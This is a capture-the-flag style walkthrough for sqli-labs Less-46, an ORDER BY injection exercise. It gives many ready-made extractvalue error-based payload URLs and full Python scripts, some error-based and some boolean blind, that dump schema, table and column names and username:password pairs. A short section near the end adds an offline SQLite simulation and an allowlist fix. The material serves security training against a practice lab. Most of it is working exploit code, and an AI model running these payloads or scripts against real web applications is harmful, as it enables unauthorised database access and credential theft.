sqli-labs-master Less 46 (ORDER BY injection via the sort parameter)

Published 2025/2/26 4:12:57 (category: embedded)

Contents

Error-based injection

Direct injection with URLs

Database

Tables in the database

Structure of the users table:

Data in the users table:

Injection with Python scripts

Error-based

Getting the database

Getting table names

Getting the table structure

Getting the data

Boolean-based blind injection

Getting the database

Getting table names

Getting the table structure

Getting the data


Error-based injection

Direct injection with URLs

In Less-46 the sort parameter is concatenated straight into the ORDER BY clause (SELECT * FROM users ORDER BY $id, with $id taken from ?sort=). An ORDER BY key is an expression, not a quoted value, so there is no quote to close: a bracketed expression is evaluated as-is. The page prints MySQL's error text, so extractvalue() with a malformed XPath string leaks whatever is concatenated into it.

Database

Current database name:

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select database()))))

All schema names on the server:

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata))))

The error message is limited in length, so read the value in pieces with substr(). MySQL shows at most 32 characters of the offending XPath expression, and the leading ~ takes one of them, so each request reveals 31 characters; that is why the second window starts at offset 32 (the length 64 is just generous, only 31 characters are ever shown):

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),1,32))))

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,schema_name,0x7e) from information_schema.schemata),32,64))))

Tables in the database

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,(select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'))))

Similarly, window the result with substr() (here the second window, offset 32):

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema='security'),32,64))))

Structure of the users table:

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema='security' and table_name='users'),1,32))))

Data in the users table (username:password, again 31 characters per request):

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,32))))

http://sqli-labs:8013/Less-46/?sort=(extractvalue(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),32,64))))
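The windows above (offset 1, then 32, then 63, ...) look off by one but are correct, because the tilde consumes one of the 32 characters MySQL prints. The following helper is an added example, not code from the original post: it builds the same ?sort= payload, computes the substr() windows, parses the leak with the same regular expression the scripts below use, and reassembles a long value. The fake_server function and the SECRET string are constructed stand-ins for the lab so that it runs offline; the only MySQL fact it relies on is the 32-character limit of the XPATH error text.

```python
import re

# Added example (not from the original post). MySQL reports at most 32 characters of the bad
# XPath expression in "XPATH syntax error: '...'", and the "~" from concat(0x7e, ...) takes one,
# so each request shows 31 characters of the injected value.
XPATH_ERROR_LIMIT = 32
CHUNK = XPATH_ERROR_LIMIT - 1
LEAK_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def build_sort_payload(subquery, offset, length=CHUNK):
    """The ?sort= value used by the manual URLs above, with a substr() window applied."""
    return f"(extractvalue(1,concat(0x7e,substr(({subquery}),{offset},{length}))))"


def chunk_windows(total_length, chunk=CHUNK):
    """(offset, length) pairs for substr(): 1, 32, 63, ... so no character is skipped or repeated."""
    return [(offset, chunk) for offset in range(1, total_length + 1, chunk)]


def mysql_substr(value, pos, length):
    """1-based SUBSTR(str, pos, len) as MySQL evaluates it, for the offline stand-in."""
    if pos < 1 or length < 1:
        return ""
    return value[pos - 1:pos - 1 + length]


def simulate_extractvalue_error(leaked):
    """What the lab page would print for extractvalue(1, concat(0x7e, leaked)): the XPath text
    truncated to 32 characters. Constructed stand-in; on the lab the text comes from MySQL."""
    return f"XPATH syntax error: '{('~' + leaked)[:XPATH_ERROR_LIMIT]}'"


def parse_leak(page_text):
    """Same regex the scripts use: the text after the tilde, up to the closing quote."""
    match = LEAK_RE.search(page_text)
    return match.group(1) if match else None


def dump_in_chunks(fetch_page, chunk=CHUNK):
    """Reassemble a long value 31 characters per request.
    fetch_page(offset, length) returns the page text for one substr() window."""
    parts = []
    offset = 1
    while True:
        piece = parse_leak(fetch_page(offset, chunk))
        if not piece:
            break
        parts.append(piece)
        if len(piece) < chunk:      # short piece: end of the value
            break
        offset += chunk
    return "".join(parts)


# Constructed stand-in for the lab: answers the schema-name dump as the server would.
SECRET = "~information_schema~,~challenges~,~mysql~,~performance_schema~,~security~"


def fake_server(offset, length):
    return simulate_extractvalue_error(mysql_substr(SECRET, offset, length))


if __name__ == "__main__":
    # A 32-character window still shows only 31 characters, which is why the second URL starts at 32.
    print(len(parse_leak(fake_server(1, 32))))     # 31
    print(chunk_windows(len(SECRET)))              # [(1, 31), (32, 31), (63, 31)]
    print(dump_in_chunks(fake_server) == SECRET)   # True
```

Against the real lab, fetch_page would issue the HTTP request with build_sort_payload() and return response.text; everything else stays the same. If a value contains a single quote the regex stops early, which is one more reason to prefer hex-encoded separators such as 0x7e and 0x3a in the concatenation.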

Injection with Python scripts

Error-based

Getting the database

import requests
import re

target_url = "http://sqli-labs:8013/Less-46/"


def extract_database_names():
    database_names = []
    index = 0
    while True:
        # Each request leaks one schema name (limit index,1) through the XPATH error message
        payload = {
            "sort": f"(extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {index},1))))"
        }
        try:
            response = requests.get(target_url, params=payload, timeout=10)
            response.raise_for_status()
            match = re.search(r"XPATH syntax error: '~([^']+)", response.text)
            if match:
                db_name = match.group(1)
                database_names.append(db_name)
                print(f"Extracted database name: {db_name}")
                index += 1
            elif index == 0:
                print("No database name found; the injection may not work or error messages are hidden")
                break
            else:
                print("All database names extracted")
                break
        except requests.exceptions.RequestException as e:  # covers Timeout and HTTPError
            print(f"[-] Request error at index {index}: {e}")
            break  # do not loop forever on a persistent error
    return database_names


if __name__ == "__main__":
    all_database_names = extract_database_names()

Getting table names

import requests
import re

target_url = "http://sqli-labs:8013/Less-46/"


def extract_table_names(database_name):
    table_names = []
    index = 0
    while True:
        # One table name per request, stepping through information_schema.tables with limit
        payload = {
            "sort": f"(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='{database_name}' limit {index},1))))"
        }
        try:
            response = requests.get(target_url, params=payload, timeout=10)
            response.raise_for_status()
            match = re.search(r"XPATH syntax error: '~([^']+)", response.text)
            if match:
                table_name = match.group(1)
                table_names.append(table_name)
                print(f"Extracted table name: {table_name}")
                index += 1
            elif index == 0:
                print("No table name found; the injection may not work or error messages are hidden")
                break
            else:
                print("All table names extracted")
                break
        except requests.exceptions.RequestException as e:
            print(f"[-] Request error at index {index}: {e}")
            break
    return table_names


if __name__ == "__main__":
    database_name = "security"  # target database name
    all_table_names = extract_table_names(database_name)

Getting the table structure

import requests
import re

target_url = "http://sqli-labs:8013/Less-46/"


def extract_column_names(database_name, table_name):
    column_names = []
    index = 0
    while True:
        # One column name per request from information_schema.columns
        payload = {
            "sort": f"(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{database_name}' limit {index},1))))"
        }
        try:
            response = requests.get(target_url, params=payload, timeout=10)
            response.raise_for_status()
            match = re.search(r"XPATH syntax error: '~([^']+)", response.text)
            if match:
                column_name = match.group(1)
                column_names.append(column_name)
                print(f"Extracted column name: {column_name}")
                index += 1
            elif index == 0:
                print("No column name found; the injection may not work or error messages are hidden")
                break
            else:
                print("All column names extracted")
                break
        except requests.exceptions.RequestException as e:
            print(f"[-] Request error at index {index}: {e}")
            break
    return column_names


if __name__ == "__main__":
    database_name = "security"  # target database name
    table_name = "users"        # target table name
    all_column_names = extract_column_names(database_name, table_name)

Getting the data

import requests
import re

target_url = "http://sqli-labs:8013/Less-46/"


def extract_user_data(database_name, table_name, record_id):
    # Extract the username and password of one row. database_name is kept for symmetry with the
    # other scripts; the query runs in the connection's current database.
    data = {}
    # username
    payload_username = {
        "sort": f"(extractvalue(1,concat(0x7e,(select username from {table_name} where id={record_id} limit 0,1))))"
    }
    # password (only the first 31 characters are visible in one error message)
    payload_password = {
        "sort": f"(extractvalue(1,concat(0x7e,(select password from {table_name} where id={record_id} limit 0,1))))"
    }
    try:
        response_username = requests.get(target_url, params=payload_username, timeout=10)
        response_username.raise_for_status()
        match_username = re.search(r"XPATH syntax error: '~([^']+)", response_username.text)
        response_password = requests.get(target_url, params=payload_password, timeout=10)
        response_password.raise_for_status()
        match_password = re.search(r"XPATH syntax error: '~([^']+)", response_password.text)
        if match_username and match_password:
            username = match_username.group(1)
            password = match_password.group(1)
            data = {'username': username, 'password': password}
            print(f"{username}:{password}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error, id={record_id}: {e}")
    return data


if __name__ == "__main__":
    database_name = "security"  # target database name
    table_name = "users"        # target table name
    record_id = 1               # start from id=1
    while True:
        print(f"Extracting data for id={record_id}...")
        user_data = extract_user_data(database_name, table_name, record_id)
        if not user_data:  # stop at the first id that returns nothing (a gap in the ids ends the loop early)
            print("No more data; extraction finished.")
            break
        record_id += 1  # move on to the next id

Boolean-based blind injection

The oracle is the order of the result table. The injected if() becomes the ORDER BY key: when the condition is true the rows are sorted by id and Dumb (id=1) is in the first row; when it is false they are sorted by username and Angelina comes first. Each script binary-searches the ASCII code of one character at a time in the range 32..127 (about seven requests per character) and stops when a position yields an empty character: ascii('') is 0, every comparison is false and the search collapses to 32.

Getting the database

import requests
from bs4 import BeautifulSoup


# Read the username in the first row of the result table (the oracle for the injected condition)
def get_username(resp):
    soup = BeautifulSoup(resp, 'html.parser')
    try:
        username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
    except IndexError:
        username = ""
    return username


# Send a request to the target URL and return the response
def send_request(url):
    try:
        resp = requests.get(url)
        return resp
    except requests.RequestException as e:
        print(f"Request error: {e}")
        return None


# Get the database name
def get_database_name():
    database_name = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
            resp = send_request(url)
            if resp and 'Dumb' == get_username(resp.text):
                left = mid + 1      # character code is above mid
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:               # empty character: end of the string
            break
        database_name += chr(mid)
        i += 1
    print(f"Database Name: {database_name}")


if __name__ == '__main__':
    get_database_name()

Getting table names

import requests
from bs4 import BeautifulSoup


# Read the username in the first row of the result table (the oracle for the injected condition)
def get_username(resp):
    soup = BeautifulSoup(resp, 'html.parser')
    try:
        username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
    except IndexError:
        username = ""
    return username


# Send a request to the target URL and return the response
def send_request(url):
    try:
        resp = requests.get(url)
        return resp
    except requests.RequestException as e:
        print(f"Request error: {e}")
        return None


# Get the table names (comma-separated, via group_concat)
def get_table_names():
    tables = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = (f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(table_name) from "
                   f"information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- ")
            resp = send_request(url)
            if resp and 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        tables += chr(mid)
        i += 1
    print(f"Tables: {tables}")


if __name__ == '__main__':
    get_table_names()

Getting the table structure

import requests
from bs4 import BeautifulSoup


# Read the username in the first row of the result table (the oracle for the injected condition)
def get_username(resp):
    soup = BeautifulSoup(resp, 'html.parser')
    try:
        username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
    except IndexError:
        username = ""
    return username


# Send a request to the target URL and return the response
def send_request(url):
    try:
        resp = requests.get(url)
        return resp
    except requests.RequestException as e:
        print(f"Request error: {e}")
        return None


# Get the column names of the users table
def get_column_names():
    columns = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = (f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(column_name) from "
                   f"information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},id,username) -- ")
            resp = send_request(url)
            if resp and 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        columns += chr(mid)
        i += 1
    print(f"Columns in 'users': {columns}")


if __name__ == '__main__':
    get_column_names()

Getting the data

import requests
from bs4 import BeautifulSoup


# Read the username in the first row of the result table (the oracle for the injected condition)
def get_username(resp):
    soup = BeautifulSoup(resp, 'html.parser')
    try:
        username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
    except IndexError:
        username = ""
    return username


# Send a request to the target URL and return the response
def send_request(url):
    try:
        resp = requests.get(url)
        return resp
    except requests.RequestException as e:
        print(f"Request error: {e}")
        return None


# Get the data (username:password pairs)
def get_user_data():
    user_data = ''
    i = 1
    while True:
        left = 32
        right = 127
        mid = (left + right) // 2
        while left < right:
            url = (f"http://sqli-labs:8013/Less-46/?sort=if(ascii(substr((select group_concat(username,':',password) "
                   f"from users),{i},1))>{mid},id,username) -- ")
            resp = send_request(url)
            if resp and 'Dumb' == get_username(resp.text):
                left = mid + 1
            else:
                right = mid
            mid = (left + right) // 2
        if mid == 32:
            break
        user_data += chr(mid)
        i += 1
    print(f"User Data (username:password): {user_data}")


if __name__ == '__main__':
    get_user_data()
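The scripts above need the lab running. The following is an added example, not code from the original post: it rebuilds the Less-46 sink (a sort key concatenated into ORDER BY) with SQLite so the boolean oracle and the binary search can be run offline, and sets the vulnerable handler beside the hardened one. The user rows are constructed to mirror sqli-labs' security.users table (an assumption about the lab data); SQLite has no if() or ascii(), so the payload uses CASE WHEN and unicode() where the MySQL payload uses if(ascii(...)).

```python
import sqlite3

# Added example (not from the original post): the ORDER BY injection of Less-46 rebuilt with
# SQLite so the boolean oracle used by the scripts above, and the fix, can be run without the lab.
# Rows constructed to mirror sqli-labs' security.users table (assumption about the lab data).
USERS = [
    (1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword"),
    (4, "secure", "crappy"), (5, "stupid", "stupidity"), (6, "superman", "genious"),
    (7, "batman", "mob!le"), (8, "admin", "admin"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def list_users_vulnerable(conn, sort):
    # Same shape as the lab's query: SELECT * FROM users ORDER BY $id, with $id straight from ?sort=
    return conn.execute(f"SELECT id, username, password FROM users ORDER BY {sort}").fetchall()


SORT_COLUMNS = {"id": "id", "username": "username", "password": "password"}


def list_users_safe(conn, sort):
    # An ORDER BY key is an identifier, not a value, so it cannot be a bound parameter:
    # map the client's choice onto an allowlist and reject everything else.
    column = SORT_COLUMNS.get(sort)
    if column is None:
        raise ValueError(f"unsupported sort key: {sort!r}")
    return conn.execute(f"SELECT id, username, password FROM users ORDER BY {column}").fetchall()


def safe_handler_rejects(conn, sort):
    try:
        list_users_safe(conn, sort)
    except ValueError:
        return True
    return False


def first_username_is_dumb(conn, sort):
    # The oracle of the scripts above: ORDER BY id lists Dumb first, ORDER BY username lists Angelina first
    rows = list_users_vulnerable(conn, sort)
    return bool(rows) and rows[0][1] == "Dumb"


def blind_extract(conn, subquery):
    # Same binary search over ASCII 32..127 as the scripts above. On MySQL the payload would be
    # if(ascii(substr((subquery),pos,1))>N,id,username); SQLite needs CASE WHEN and unicode().
    value = ""
    position = 1
    while True:
        left, right = 32, 127
        while left < right:
            mid = (left + right) // 2
            payload = (f"CASE WHEN unicode(substr(({subquery}),{position},1)) > {mid} "
                       f"THEN id ELSE username END")
            if first_username_is_dumb(conn, payload):
                left = mid + 1
            else:
                right = mid
        if left == 32:   # past the end: substr() gave '' , unicode('') is NULL, every test failed
            break
        value += chr(left)
        position += 1
    return value


if __name__ == "__main__":
    db = make_db()
    print(blind_extract(db, "SELECT password FROM users WHERE username='admin'"))  # admin
    print(safe_handler_rejects(db, "CASE WHEN 1=1 THEN id ELSE username END"))      # True
```

The allowlist is the whole fix: because the sort key is an identifier, prepared statements cannot protect it, and the handler has to map the request value onto a fixed set of column names (optionally plus ASC/DESC) before it touches the query. Displaying the database error to the client is the second defect the lab demonstrates; without it the error-based dumps above would not work, and only this slower boolean oracle would remain.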


http://www.ppmy.cn/embedded/167188.html
